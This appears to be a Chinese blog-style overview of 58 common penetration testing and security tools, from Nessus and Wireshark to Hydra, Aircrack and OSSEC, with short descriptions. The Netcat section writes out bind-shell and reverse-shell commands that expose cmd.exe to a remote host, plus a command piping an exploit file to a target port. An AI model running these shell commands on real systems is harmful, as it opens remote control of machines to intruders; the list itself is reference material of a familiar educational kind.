常见黑客渗透测试工具

一、Nessus
是扫描UNIX漏洞的主力工具,随后栖身Windows。主要功能包括本地和远程安全审查,支持client/server结构,具有GTK图形界面,并支持脚本语言编写插件。属免费开源。

二、Wireshark
说起Wireshark,不得不提Ethereal,Ethereal和Windows的sniffer pro并称网络嗅探工具双雄,不过和sniffer pro不同的是Ethereal在Linux类系统中应用更为广泛。而Wireshark则是Ethereal后续版本,是在Ethereal被收购后推出的最新网络嗅探软件,是功能强大的网络数据捕获工具,可分析网络数据流量,在第一时间发现蠕虫病毒,木马程序以及ARP欺骗等问题的根源。

三、Snort
Snort免费跨平台,用作监视小型TCP/IP网的嗅探器、日志记录、侵入探测器。可运行linux/UNIX和Win,snort有三种工作模式:嗅探器、数据包记录器、网络入侵检测系统。
嗅探器模式是snort从网络上读出数据包然后显示控制台上。例如要把TCP/IP包头信息打印在屏幕上,需要输入命令:snort -v

四、Netcat
netcat被誉为‘瑞士军刀',一个简单有用的工具,透过使用TCP或UDP协议的网络连接读写数据。它被设计成一个稳定的后门工具,是一个功能强大的网络调试和探测工具。
1)例子:连到192.168.x.x的TCP80端口的命令:nc -nvv 192.168.x.x 80

  1. 监听本机的TCP80端口: nc -l -p 80
  2. 扫描192.168.x.x的TCP80到TCP445的所有端口: nc -nvv -w2 -z 192.168.x.x 80-445
  3. 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口REMOTE主机绑定SHELL: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
    5)REMOTE主机绑定SHELL并反向连接,例如:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口的命令:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
    6)作攻击程序用,例子:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'内容:
    格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
    格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
    7)作蜜罐用,例子:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
    格式:nc -L -p 80

五、Metasploit Framework
是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。

六、Hping2
Hping2:一种网络探测工具,是ping的超级变种,这个小工具可以发送自定义的ICMP,UDP和TCP数据包,并接收所有反馈信息。例如可以设置时间间隔,数据包发送的频率(-i uX X为微秒),命令为:hping2 192.168.0.1 -c 2 -i u1000

七、Kismet
Kismet是一个基于Linux的无线网络扫描程序,一个相当方便的工具,通过测量周围无线信号找到目标WLAN。当Kismet开始运行时,将会显示这个区域内它找到所有的无线局域网,“Name”列中所显示出来的就是WLAN中AP的SSID值,开始设定的目标WLAN也应该包含中其中,在这一行中,CH列的值(AP所使用的频道)应该与开始所记下的相同。在窗口的最右边显示的信息是Kismet发现的WLAN的数目,已被捕捉下来了的数据包、已加密了的数据包的数目等等。甚至当目标计算机已关闭时,Kismet也正可从我们的目标AP中检测到数据包,这是因为目标AP在不停地发出“beacons”,它将告之拥有无线网卡的计算机有一个AP在此范围内。

八、Tcpdump
基于linux 的TcpDump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。tcpdump就是一种免费的网络分析工具,尤其其提供了源代码,公开了接口,因此具备很强的可扩展性,对于网络维护和入侵者都是非常有用的工具。

九、Cain and Abel
是一款Windows平台下的口令恢复工具。它通过采用多种方式来恢复多种口令,采取方式包括:嗅探网络,使用字典、暴力、密码分析方法破解解密口令,记录VoIP会话,解码混杂口令,恢复无线网络密钥,揭示口令框中输入的口令(星号查看),披露缓冲口令和分析路由协议。这个工具没有利用任何软件漏洞或缺陷,它利用了协议标准、认证方法和缓冲机制本身存在的安全问题以及内在的弱点,其主要目的是简单地恢复多种程序的口令和凭证。该软件由两部分组成:Cain和Abel。Cain(Cain.exe)是程序的主图形界面,Abel是一个Windows服务,由文件Abel.exe和Abel.dll组成。

十、John the Ripper
用于在已知密文的情况下尝试破解出明文的破解密码软件。目前的最新版本是 JOHN 1.4 版, 主要支持对 DES、 MD5 两种加密方式的密文进行破解工作。它可以工作于多中不同 的机 型 以及多种不同的操作系统。

十一、Ettercap
Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。Ettercap有5种sniffing工作方式:
(1)IPBASED:基于IP地址的sniffing方式,Ettercap根据源IP-PORT和目的IP-PORT来捕获数据包。
(2)MACBASED: 基于MAC地址的方式,Ettercap将根据源MAC和目的MAC来捕获数据包。
(3) ARPBASED : 基于ARP欺骗的方式下,Ettercap利用ARP欺骗在交换局域网内监听两个主机之间的通信(全双工)。
(4) SMARTARP: 在SMARTARP方式下,Ettercap利用ARP欺骗,监听交换网上某台主机与所有已知的其他主机(存在于主机表中的主机)之间的通信(全双工)。
(5) PUBLICARP : 在PUBLICARP方式下,Ettercap利用ARP欺骗,监听交换网上某台主机与所有其它主机之间的通信(半双工)。

十二、Nikto
Nikto 是一款开放源代码的、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题,它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的 http模式等等。它也使用LibWhiske库,但通常比Whisker更新的更为频繁。Nikto是网管安全人员必备的WEB审计工具之一。

十三、Ping/telnet/dig/traceroute/whois/netstat:最基本的安全命令。

十四、OpenSSH / PuTTY / SSH
SSH(Secure Shell)现在普遍应用于登录远程计算机或在其上执行命令。为不安全网络上的两台不互信计算机间通讯提供安全加密,代替非常不可靠的telnet/rlogin/rsh交互内容。大多unix使用开源的OpenSSH服务器和客户端程序。Windows用户更喜欢免费的PuTTY客户端,也可以运行在多种移动设备上。还有一些windows用户喜欢使用基于终端的OpenSSH模拟程序Cygwin。

十五、THC Hydra
如果某人需要暴力破解一个远程认证服务,Hydra经常会是选择对象。它可以同时对30个以上的端口进行基于字典的快速破解,包括telnet、ftp、http、https、smb、多种数据库及其它服务。和THC Amap一样,Hydra来自于民间组织THC。

十六、Paros proxy
proxy是架设在攻击者的浏览器和目标网站中间,所有的要求和回应都会被送到,藉此骇客得以仔细研究这些封包资讯,包括在网页传送中的、变数,并可以修改这些变数后再送出。proxy功能齐全,具备网站弱点扫描和侦测能力,对一些常见的网页应用程序攻击,都可进行检测,甚至能够检测出不安全的网页组件。

十七、Dsniff
Dsniff是一个高级的口令嗅探器,是第一批扩展了传统Sniffer概念的监听工具,将制造的数据包注入网络,并将通信数据重新定向到攻击者的机器。在这种方式下,Dsniff允许攻击者在交换环境的网络内窃听数据,甚至在攻击者和攻击目标不在同一个Lan,也能使攻击者收集到想要的数据。支持telnet 、ftp、smtp、pop、imap、http应用协议。十八、NetStumbler
NetStumbler 是一款专门用来寻找无线AP的工具,是目前最流行的无线搜寻工具。开启后能自动显示附近探测到的无线AP,并能显示这些无线AP的SSID、MAC地址、频段、速度、是否加密等信息。值得一提的是,NetStumbler可以显示设置了隐藏SSID的无线AP,在软件界面中可以看到该AP的绿灯在不断闪烁。在树状结构中列出了各频段检测到的无线AP。由于NetStumbler进行全面扫描,所以附近无线AP将一览无余。因为它是美国人开发的,所以只能检测1~11之间的11个频段,而国内无线频段分为13个频段,12~13频段的无线AP将无法搜寻到。

十九、THC Amap
它可以检测出某一端口正在被什么程序监听。因为其独有的version detection特性,所以其数据库不会象Nmap一样变得很大,在Nmap检测某一服务失败或者其它软件不起作用时可以考虑使用之。Amap的另一特性是其能够解析Nmap输出文件。这也是THC贡献的另一款很有价值的工具。

二十、GFI LANguard
企业网络漏洞管理的三大主要问题:网络扫描、网络审计和补丁管理。GFI LANguard Network Security Scanner (N.S.S.) 是一项屡获殊荣的解决方案,能够扫描、检测、评估和修复网络中的任何安全漏洞。作为管理员您经常需要处理各种不同的问题,有时会使用多种产品分别处理与网络漏洞、补丁管理和网络审计相关的问题。使用 GFI LANguard N.S.S.,漏洞管理的三大主要问题可以通过带有丰富报告功能的单个控制面板得以解决。

二一、Aircrack
Aircrack是一套用于破解8WEP和WPA的工具套装,一般用于无线网络的密钥破解,从而非法进入未经许可的无线网络。只要一旦收集到足够的加密数据包,利用它就可以破解40到512位的WEP密匙,也可以通过高级加密方法或暴力破解来破解WPA1或2网络。

二二、Superscan
SuperScan 是由Foundstone开发的一款免费的,但功能十分强大的工具,与许多同类工具比较,它既是一款黑客工具,又是一款网络安全工具。一名黑客可以利用它的拒绝服务攻击(DoS,denial of service)来收集远程网络主机信息。而做为安全工具,SuperScan能够帮助你发现你网络中的弱点。

二三、Netfilter
通俗的说,netfilter的架构就是在整个网络流程的若干位置放置了一些检测点(HOOK),而在每个检测点上上登记了一些处理函数进行处理(如包过滤,NAT等,甚至可以是用户自定义的功能)。

二四、Sysinternals
Sysinternals属于一套安全管理套件,主要包括:
(1)Process Explorer:进程管理工具,可以设置为完全取代系统自带任务管理器taskmgr,成为系统默认的“任务管理器”。里头的各种监视器非常直观地监视或者记录着系统当前的状态,而且易用性非常高。支持XP及Win2003以上系统。
(2)PsTools:一共由12个命令组成,可以用来远程管理Windows NT/2000/XP系统。可以远程整理硬盘、关闭远程计算机上运行的信使服务、查看服务器硬盘空间、查看远程计算机上的进程,并结束可疑进程、发送消息并快速关闭远程计算机等。
(3)Autoruns:强大、完整的启动项扫描工具!
(4)TCPView:检测端口的软件,很小很好用。
(5)RootkitRevealer:可以用来检测系统Windows系统里边是否运行着Rootkit,它通过分析注册表和系统API文件差异,能检测出来www.rootkit.com发布的所有rootkit,包括AFX、Vanquish、HackerDefender 等(注意:RootkitRevealer是不能够检测那些没有隐藏文件和注册表的Rootkit,比如FU_Rootkit)。

二五、Retina
Retina 已经被业界认为是最精确的非嵌入式网络安全扫描器,它包含有最全面的安全漏洞数据库,该数据库由eEye公司的研发队伍所维护。作为一个同时面向分布式企业用户和单机网络环境用户的专业安全软件,Retina已经被许多世界上最大的公司和政府部门使用。他们用于检测各个分公司/总公司/政府部门的网络安全,矫正网络中隐藏的漏洞和不安全的设置。

二六、Perl / Python / Ruby
perl比ruby或者python都要古老些。perl曾经是最流行的脚本语言,曾经也被认为是黑客必备。可以只用几行就完成复杂数据的处理,而且速度不必同样的c慢许多,内置的对正则表达式和数据结构的支持更是令人惊叹。 以前许多网站都用perl写的。即使现在,国外有些较老的网站也有部分代码还是perl。perl最强大之处在于它有数不清的库支持,perl可是说有着世界上最大的社区,你想做什么事情都找得到相应的库。但是perl的缺点也很明显:perl的程序实在是太灵活了,一个问题通常有非常多的解决方案,正如一句话有非常多的说法一样,而且perl的语法对于不熟悉它的人完全是天书。ruby和python都是作为perl的替代者出现的。最新的perl加入了对面向对象的支持,ruby和python对面向对象的支持更好(甚至要好于java)。

二七、L0phtcrack
L0phtCrack v5.04,简称LC 5,这是一款网络管理员的必备的工具,它可以用来检测Windows、UNIX 用户是否使用了不安全的密码,同样也是最好、最快的Win NT/2000/XP/UNIX 管理员帐号密码破解工具。事实证明,简单的或容易遭受破解的管理员密码是最大的安全威胁之一,因为攻击者往往以合法的身份登陆计算机系统而不被察觉。

二八、Scapy
Scapy是一款强大的交互式数据包处理工具、数据包生成器、网络扫描器、网络发现工具和包嗅探工具。它提供多种类别的交互式生成数据包或数据包集合、对数据包进行操作、发送数据包、包嗅探、应答和反馈匹配等等功能。

二九、Sam Spade
SamSpade提供了一个友好的GUI界面,能方便地完成多种网络查询任务,它开发的本意是用于追查垃圾邮件制造者,但也能用于其它大量的网络探测、网络管理和与安全有关的任务,包括ping、nslookup、whois、dig、traceroute、finger、raw HTTP web browser、DNS zone transfer、SMTP relay check、website search等工具,是一个集成的工具箱。

三十、GnuPG / PGP
随着网络与计算机技术的发展,数据存储与数据交换的安全性已经变得越来越重要,加密技术已经很早就用于数据存和数据交换。为了确保网络数据交换时的双方身份的正确性,签证体系也已经成熟。GnuPG就是用来加密数据与制作证书的一套工具,其作用与PGP类似。但是PGP使用了许多专利算法。

三一、Airsnort
这个程序利用被使用相当普及、根据一般标准设计的网络加密系统“Wi-fi”(或称为802.11b)的缺点进入网络,但另一种加密系统则尚未被AirSnort 或WEPCrack 攻破。设计AirSnort的人相信,许多网络用户都不重视或无法了解有关Wi-fi加密系统的瑕疵。

三二、BackTrack
BackTrack是基于Slackware和SLAX的自启动运行光盘,它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX(先前的Whoppix)而创建成的。

三三、P0f
p0f 是继Nmap和Xprobe2之后又一款远程操作系统被动判别工具。它支持:反连SYN 模式、正连SYN+ACK 模式、空连RST+ 模式、碎片ACK模式。它还可以探测:是否运行于防火墙之后、是否运行于NAT模式、是否运行于负载均衡模式、远程系统已启动时间、 远程系统的DSL和ISP信息等。

三四、Google:人见人爱的搜索引擎。

三五、WebScarab
一款代理软件 包括代理,网络爬行、网络蜘蛛,会话分析,自动脚本接口,模糊测试工具,对所有流行的格式的编码/解码,服务描述语言和解析器等。

三六、Ntop
NTOP可以把端口使用情况与应用程序关联起来,这和使用“netstat -an”命令的效果类似,并且可以显示端口打开时间、端口流量等详细信息。比如,可以把本机开放的TCP/UDP端口同应用程序关联起来。

三七、Tripwire
是目前最为著名的unix下文件系统完整性检查的软件工具,这一软件采用的技术核心就是对每个要监控的文件产生一个数字签名,保留下来。当文件现在的数字签名与保留的数字签名不一致时,那么现在这个文件必定被改动过了。

三八、Ngrep
ngrep 是grep(在文本中搜索字符串的工具)的网络版,力求更多grep特征,用于搜寻指定的数据包。正由于安装ngrep需用到libpcap库, 所以支持大量的操作系统和网络协议。能识别TCP、UDP和ICMP包,理解bpf的过滤机制。

三九、Nbtscan
一个扫描WINDOWS网络NetBIOS信息的小工具,但只能用于局域网,可以显示IP,主机名,用户名称和MAC地址等等。

四十、WebInspect
被认为是下一代Web 应用程序安全性测试工具,主要功能介绍:(1)利用创新的评估技术检查 Web 服务及 Web 应用程序的安全;(2)自动执行 Web 应用程序安全测试和评估;(3)在整个生命周期中执行应用程序安全测试和协作;(4)通过最先进的用户界面轻松运行交互式扫描;(5)利用高级工具 (HP Security Toolkit) 执行渗透测试;(6)配置以支持任何 Web 应用程序环境。

四一、OpenSSL
SSL是Secure Socket Layer(安全套接层协议)的缩写,可以在Internet上提供秘密性传输。OpenSSL整个软件包可分成三个主要的功能部分:密码算法库、SSL协议库以及应用程序。

四二、Xprobe2
Xprobe2通过模糊矩阵统计分析主动探测数据报对应的ICMP数据报特征,进而探测得到远端操作系统的类型。

四三、EtherApe
网络嗅探器,能够完成与Tcpdump相同的功能,但操作界面要友好很多。Ehtereal和Tcpdump都依赖于pcap库(libpcap),因此两者在许多方面非常相似(如都使用相同的过滤规则和关键字)。Ethereal和其它图形化的网络嗅探器都使用相同的。

四四、Core Impact
公认最强漏洞检测工具,全面评估侦测,防止和应对信息安全威胁。由安全地复制真实世界的攻击网络服务器和工作站,最终用户的系统,以及Web应用程序,可协助寻找并修复安全问题。

四五、IDA Pro
是一个交互“分析员”,然而并不自动解决问题,IDA Pro 会发现指令可疑之处,并不去解决这些问题。您的工作是通知 IDA 怎样去做。

四六、SolarWinds
一个专业的网络管理软件,可以监控,发现网络设备。包括以下工具:
1. 网络性能监控(Network Performance Monitoring):带宽测量、路由CPU负荷、带宽监控、CPU测量、网络性能监控器、SNMP图象和高级CPU上传。
2. 网络发现(Network Discovery):子网列表、Ping Sweep、和IP网络浏览器、DNS核查、IP地址管理、MAC地址发现、SNMP Sweep、网络定位。
3. 用于Cisco网络的工具:IP网络浏览器、路由CPU负荷、配置下载、配置上传、配置编辑器/浏览器、Proxy Ping、对比运行VS启动配置、路由器密码加密术、CPU测量(、路由器安全检查和高级CPU上传。
4. 网络监控:Watch It!、网络监控器、Syslog 服务器、路由CPU负荷、高级ping和网络性能监控器。
5. IP地址管理(IP Address Management ):先进的子网计算器、DNS / Who Is Resolver、DHCP Scope Monitor、DNS核查、IP地址管理、Ping Sweep。
6. 安全性(Security):路由安全性检查、TCP Reset、字典编辑器、SNMP Brute Force 攻击、SNMP词典攻击、路由器密码加密术。
7. Ping & Diagnostic :ping、高级ping、Trace Route、Proxy Ping、Ping Sweep。
8. MIB浏览器:MIB Walk、更新系统MIBs、MIB浏览器、MIB浏览器和SNMP图象。
9. 其它:TFTP服务器、WAN Killer、Wake-On-Line。

四七、Pwdump:一个用来抓取Windows用户密码文档的工具。

四八、LSoF
全名list opened files,也就是列举系统中已经被打开的文件。我们知道,linux环境中任何事物都是文件,设备是文件,目录是文件,甚至sockets也是文件。所以,用好lsof命令,对日常linux管理非常有帮助。

四九、RainbowCrack
一个多功能密码破解软件,不仅能够破解密码,同时也是杂乱算法加密的破解利器。比如可破解im,md5,sha1,customizable等,其它加密方式破解也可添加到该软件中。软件同时支持Windows和Linux系统,而且在一个系统上生成的表单可以直接转换到另一种系统上使用,它功能虽然强大,但使用较复杂。

五十、Firewalk
Linux网络安全工具,使用类似traceroute技术来分析IP包响应,从而测定网关访问控制列表和绘制网络图的工具。

五一、Angry IP Scanner
一款使用方便的 IP、端口扫描工具,可获得被扫描计算机的ping响应时间、主机名称、计算机名称、工作组、登录用户名、MAC地址、TTL、NetBios 信息等;也可指定扫描端口,查看目标计算机开放端口的情况;对于活动主机,可执行在资源管理器中打开、利用网页浏览器浏览、FTP、telnet、ping、tracert 或利用网页查找指定 IP 的地理位置等操作。只需一个网址或主机名称,Angry IP Scanner 就能自动解析其 IP 地址并进行扫描。Angry IP Scanner 还支持自动选取并扫描整个 B 类和 C 类 IP 段,对常用 IP 进行收藏管理,导出扫描结果为多种文件格式等。由于采用多线程扫描,Angry IP Scanner 可以同时对几十个 IP 发起扫描,因此速度极快。

五二、RKHunter
中文名”Rootkit猎手”, 可发现大约58个已知rootkits和一些嗅探器和后门程序. 它通过执行一系列的测试脚本来确认机器是否已感染rootkits。

五三、Ike-scan
一款检测IKE(Internet Key Exchange)服务传输特性的工具,IKE是VPN网络中服务器和远程客户端建立连接的机制。在扫描到VPN服务器IP地址后,将改造过的IKE数据包分发给VPN网中的每一主机。只要是运行IKE的主机就会发回反馈来证实其存在。此工具然后对这些反馈数据包进行记录和显示,并将它们和一系列已知VPN产品指纹进行对比。

五四、Arpwatch
ARP(Address Resolution Protocol)是用来解析IP与网络装置硬件地址的协议。在linux系统下arpwatch可监听区域网络中ARP数据包并记录,同时将监听到的变化通过E-mail来报告。

五五、KisMAC
一款免费的无线协议嗅探程序,可用于Mac OX操作系统。KisMAC应用程序在安装时不安全更改文件权限,本地攻击者可以利用这个漏洞未授权访问敏感文件信息。

五六、OSSEC HIDS
一款开源入侵检测系统,包括了日志分析,全面检测,rook-kit检测。作为一款HIDS,OSSEC应该被安装在一台实施监控的系统中。另外有时不需要安装完全版本OSSEC,如果有多台电脑都安装了OSSEC,那么就可以采用客户端/服务器模式来运行。客户机通过客户端程序将数据发回到服务器端进行分析。在一台电脑上对多个系统进行监控对于企业或者家庭用户来说都是相当经济实用的。OSSEC最大优势在于它几乎可以运行在任何一种操作系统上,比如Windows, Linux, OpenBSD/FreeBSD 以及 MacOS。不过运行在Windows的客户端无法实现root-kit检测,而其他系统上客户端都没有问题。

五七、Openbsd PF
OpenBSD用户最爱用PF,这就是他们的防火墙工具。功能有网络地址转换、管理TCP/IP通讯、提供带宽控制和数据包分级控制。它还有一些额外功能,例如被动操作系统检测。PF是由编写OpenBSD的同一批人编写的,它已经过了很好评估、设计和编码以避免暴露其它包过滤器(other packet filters)上的类似漏洞。

五八、Nemesis:几乎可以用来构造任何类型的ICMP数据包。

你可能感兴趣的:(常见黑客渗透测试工具)